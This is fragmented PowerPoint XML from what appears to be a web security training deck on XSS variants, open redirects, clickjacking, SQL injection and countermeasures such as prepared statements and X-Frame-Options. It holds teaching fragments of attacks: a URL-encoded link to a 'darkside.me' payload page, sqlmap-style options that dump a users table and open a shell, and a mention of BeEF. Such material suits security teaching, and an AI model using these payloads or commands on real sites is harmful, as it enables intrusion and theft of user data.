                <a:ext cx="101520" cy="101520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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7886" y="4474754"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2604526" y="4576274"/>
                <a:ext cx="3960" cy="2880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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95526" y="4567274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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2650966" y="4399154"/>
                <a:ext cx="23760" cy="162720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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42326" y="4390514"/>
                  <a:ext cx="4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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2608486" y="4353074"/>
                <a:ext cx="157680" cy="121320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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9486" y="4344074"/>
                  <a:ext cx="175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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2763646" y="4449554"/>
                <a:ext cx="117000" cy="112680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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54646" y="4440914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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2879926" y="4456394"/>
                <a:ext cx="66240" cy="122400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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71286" y="4447394"/>
                  <a:ext cx="8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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2957686" y="4486994"/>
                <a:ext cx="81720" cy="72360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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48686" y="4478354"/>
                  <a:ext cx="9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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3014926" y="4475834"/>
                <a:ext cx="60480" cy="214560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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6286" y="4466834"/>
                  <a:ext cx="78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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3147766" y="4351994"/>
                <a:ext cx="62280" cy="198360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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8766" y="4342994"/>
                  <a:ext cx="7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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3229126" y="4448114"/>
                <a:ext cx="97200" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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20126" y="4439474"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3364846" y="4448474"/>
                <a:ext cx="89640" cy="77760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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56206" y="4439474"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3473206" y="4437314"/>
                <a:ext cx="27720" cy="88560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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4206" y="4428674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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3558886" y="4434794"/>
                <a:ext cx="90720" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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49886" y="442579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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3648166" y="4356314"/>
                <a:ext cx="35280" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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39166" y="4347314"/>
                  <a:ext cx="52920" cy="17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5" name="Gewitterblitz 1154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D101A79-6171-4747-A541-8749CBC47EF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2655851" y="2564178"/>
            <a:ext cx="365778" cy="4093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6666C-8C90-4020-9E49-B10E4036D0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:off x="6591330" y="2660949"/>
            <a:ext cx="5355183" cy="4058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9FF2E03-637A-4A2E-AF44-75FE0D9D0C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:off x="1031182" y="3603312"/>
            <a:ext cx="4121191" cy="3004841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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041B2BA-6670-43F9-8074-670A614DC10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1111130" y="1417025"/>
            <a:ext cx="2266560" cy="1233360"/>
            <a:chOff x="8755481" y="4747220"/>
            <a:chExt cx="2266560" cy="123336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57AF1EE5-6A18-4F0D-96EE-B0CA81823AD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543572EF-1CE0-445B-9006-3D882EAB41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BFAE395A-C8C5-4E37-A0D7-DBA191865B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F1C770B7-4A6F-44CF-AFF5-3C8A0B52D889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D4574069-5116-453E-9CF6-32C4010BA4B4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65DC867E-5AD5-4AD1-80BA-7CA9BC6BA8F1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79CD955-8FAA-4049-93A0-99F226A3742F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3B2B0316-D598-4FC7-AFCC-4CBB679AC64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839254FD-AC48-407E-8ECF-513B69F5F02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71DC9F95-DBDA-4B3F-85FA-70AAE644422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7BC6A12C-0A2C-4DEB-BA57-EC78F13138EE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98E4B4A4-EA96-4DCD-8C4A-4042A4C7A93F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7AC384E4-0B20-442F-9B3A-EBAA8BBEAB8D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E281F031-32C1-43FA-A720-CE977FE3AA6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2FD8297-56A4-4591-9E9D-E8C94F9952D9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80D1113-0991-4892-A661-0D3EE656BB52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10A93A64-F3C2-427A-B850-E16B12698A0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3929D030-EE2A-4BD5-92EF-B9B710E1B411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873BEB6A-8B71-4664-A8BC-254BDA5B61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3472063-DA17-4E78-9371-509B8D805726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307FB5A5-4DEB-4E6D-A150-57C8E4413D2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51718F6F-163C-42BE-AB5B-441693FC641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2646EB2-61D2-4019-94E1-9DDB9356907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0B25FD8-97C3-4E7A-9E97-610A91FDE05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09A16ECF-2D8B-4A0E-A4C1-33891E9A2583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AE9AB745-5822-4B3D-86C2-509564808A6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B1882655-2054-4228-B526-7C5FF8AD960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88E22A4D-9AD2-4A84-9290-E47DF94F977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A4BB81E1-02C7-4702-8E53-F321649661E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5419465" y="1706825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EFE37D2B-3658-483A-8E70-7BD42245B74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BF602D25-1B0F-4996-B624-BE58C52D4996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4ACB0B8F-C7ED-4765-ACBD-CD19C126C112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8607258-8867-43D9-82B5-99FE7D090619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C94B23ED-BA6D-439D-873C-0403575B724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7BD3A896-A3F6-4E72-9B4E-53B87AC0ED3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7B88E786-E33C-4B85-9558-CE33414EADED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60B53B5C-A2B6-4A59-8AD5-C65ECACAB86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526DC4E2-CA56-4822-861F-BE76BF683CC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88480F26-959C-4888-BDE3-8BE19210BD71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55998DFA-1378-4BF2-ACF4-8F2388F7C029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D40A8B86-F128-4942-AE7C-897A830591F6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ABFB9311-7B1F-4C5D-A497-7A60E54F069D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A768CCEF-9CCF-47FF-B62B-366C170630F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17BCB85-911A-4F7D-BE0A-C20F7776B79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18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CC6BE9-2E11-43CB-83A5-0CB80E5E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24" y="191815"/>
            <a:ext cx="7255751" cy="23895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40D6270-108C-4BD9-AE3D-6E39B01C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8" y="2866919"/>
            <a:ext cx="8660524" cy="2819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5B22B3-3EE9-41F5-8EF4-666BA0FE79DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210207" y="5905488"/>
            <a:ext cx="11771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on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client-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side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only</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="28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1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DFF6-9ABA-4A58-BF3B-1F388E1B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+ Client XSS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D85DF-C13B-4C32-806C-68FF784C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74" y="1843521"/>
            <a:ext cx="4547400" cy="37957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E54C46D-56AB-4CF5-BA9C-1BB727BF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1" y="1843521"/>
            <a:ext cx="725821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4DD9397-F236-46DB-BC99-76B2C47C11B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="388883" y="282303"/>
          <a:ext cx="11487807" cy="584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25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54046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113800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XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>Variations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Serverside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Clientside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264719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Reflected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(„Non-Persistent)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Payload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</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t>( In 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back)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>Client </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>application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embeds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r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>Browser </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>interprets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endParaRPr lang="de-AT" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>Classic DOM-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>based</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t> XSS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT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93208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(„Persistent“)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Client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DOM-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0" err="1"/>
                        <a:t>based</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" dirty="0"/>
                        <a:t> XSS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/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BF3C057-FE5C-4683-9E68-018B7C39D0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520965" y="6475859"/>
            <a:ext cx="8828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dirty="0"/>
              <a:t>https://owasp.org/www-community/Types_of_Cross-Site_Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171923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D858BD-53FB-47AE-AEBE-AAD595E8DEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4426020" y="2041701"/>
            <a:ext cx="2710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still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lame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65B893-DA1A-4373-9CD5-B175BEA8E88B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092141" y="3136612"/>
            <a:ext cx="8007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Let‘s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can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BeEF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1415C4-7DE1-4535-A32F-3BDA092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11" y="3867807"/>
            <a:ext cx="2787377" cy="2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095A26-AC52-43A0-A770-E3E06A5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4" y="1205834"/>
            <a:ext cx="10620511" cy="4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1C644E-9ABC-41C0-91DF-0C9DE917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225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4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93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Scripting (XSS)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malicious JavaScript code in the user‘s browser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injecting the code via the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Output Encoding (frameworks)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HTTPOnly</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> Flag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A7:2017-Cross-Site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C735EA8-4C70-48F2-85E9-C6AC783C6630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5129050" y="2048431"/>
          <a:ext cx="5213129" cy="12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364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28828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Variations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Serverside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Clientside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0370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Non-Persistent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Reflected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/>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT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6333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4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7A30B8-51AF-4074-8842-DD2D30F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5" y="387240"/>
            <a:ext cx="5154791" cy="34620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81917C-24D5-4B75-9852-B912CB8E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36" y="387240"/>
            <a:ext cx="4772025" cy="15716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7B134D-035E-44D9-9AFF-414F0193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2012"/>
            <a:ext cx="12192000" cy="8821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FEFBB3-5236-4AD1-8471-3F8CCD68B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18" y="2755988"/>
            <a:ext cx="5695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66217A-C3E2-44CB-8622-0845945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42" y="3564667"/>
            <a:ext cx="6568802" cy="27742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29D77C-4398-49BB-8434-A06845582E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600218" y="2476438"/>
            <a:ext cx="111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/>
              <a:t>%68%74%74%70%3a%2f%2f%64%61%72%6b%73%69%64%65%2e%6d%65%2f%70%61%79%6c%6f%61%64%2e%68%74%6d%6c</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>http://darkside.me/payload.html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2A58B-5671-4431-AE65-F5520B3B7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00"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1261367"/>
            <a:ext cx="12192000" cy="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Unverified</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="3200" b="1" i="0" u="none" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>/Open Redirects/Forwards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to a malicious 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very good way for phishing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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>userinput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> is used in redirection/forward links, those links can be manipulated   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validate redirection/forward URLs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by whitelist if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Was </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
                        <a:t>kicked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Define an approach that ensures all data are explicitly validated.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A8D313-C60B-4143-8B57-C5D10D2B4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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883947" y="3139972"/>
            <a:ext cx="3674745" cy="5780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F49674-7759-4D2E-B296-D829C1E4C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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883947" y="3806112"/>
            <a:ext cx="5201883" cy="10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11B61FC-BD17-4CD2-B868-F49192E5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8603"/>
            <a:ext cx="9553576" cy="34804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BD22156-64F0-4AD6-9F66-925F1CB6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88" y="3876673"/>
            <a:ext cx="6504623" cy="2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5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3702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Clickjacking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into clicking things he actually doesn’t want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093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including the form as a transparent overlay-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>iFrame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 the user thinks he clicks at the visible underlay, but actually clicks the invisible overlay.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3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X-Frame-Options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deny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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>sameorigin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X-Frame-Options: allow-from https://my-trusted-partner.com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A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de-AT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 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my-trusted-partner.com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7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0044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just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and backend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/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weapon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escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>sanitize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2144AF-35BE-447C-8AC6-60CBF2A52549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302364" y="6023296"/>
            <a:ext cx="75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1 character of the first username equals "m"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53D162-3479-4162-A982-CD9BAEBB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48265"/>
            <a:ext cx="11446767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4F4EEE-76D3-41D8-8C4E-6ADD27DF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1" y="2158735"/>
            <a:ext cx="11623197" cy="25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27D1D4-2AE6-461F-BF64-53DEEB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0" y="1937857"/>
            <a:ext cx="12192000" cy="2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CE2ABA2-597C-4BDC-8443-5576268C040E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075266" y="599703"/>
            <a:ext cx="1057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-T users --dump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A59CAE-7C7E-46CF-8FD4-D77440B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0" y="1092729"/>
            <a:ext cx="7497481" cy="22600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814680-6276-43DB-8D4C-325424000F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075266" y="3817035"/>
            <a:ext cx="10066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-shell</a:t>
            </a:r>
          </a:p>
          <a:p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Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lightside.users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...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39DE5-0330-4865-AB42-07D3DDC8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1154640" y="5105213"/>
            <a:ext cx="6493915" cy="10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DE994-02AE-4B91-99E3-CFBBC34B3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926732" y="1964371"/>
            <a:ext cx="10338536" cy="1710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9D0020-DB1C-4A14-B642-5E3918DF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611" y="4038596"/>
            <a:ext cx="6900778" cy="24147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6E57A5B-5B0D-4511-A2EA-5E37AD7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Prepared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Statements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83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08C272E-B879-4659-A02F-A5997F6834D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319048" y="6492875"/>
            <a:ext cx="10815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/>
              <a:t>https://www.doctrine-project.org/projects/doctrine-orm/en/current/tutorials/getting-started.html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08DF019-DECD-4F75-AD35-C4C8D49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r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>ORM </a:t>
            </a:r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Doctrine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BD4E5-5920-4A9F-B73D-B72389BD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1" y="1410937"/>
            <a:ext cx="3710152" cy="5019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6219C5-A3AF-4ADB-81E7-144A7066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41" y="1410938"/>
            <a:ext cx="4763567" cy="4201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C4C69B-9366-4362-BE8C-D07FEC59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41" y="5864638"/>
            <a:ext cx="4763567" cy="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1782</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>274</Paragraphs>
  <Slides>37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Prepared Statements example</vt:lpstr>
      <vt:lpstr>ORM example (Doctrine)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Some more backend injections</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Countermeasures (excerpt)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Billion Laughs Attack</vt:lpstr>
      <vt:lpstr>Key messages</vt:lpstr>
      <vt:lpstr>Rough Overview</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Combination Stored + Client XSS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2020-11-24T07:38:10Z</dcterms:modified>
</cp:coreProperties>
</file>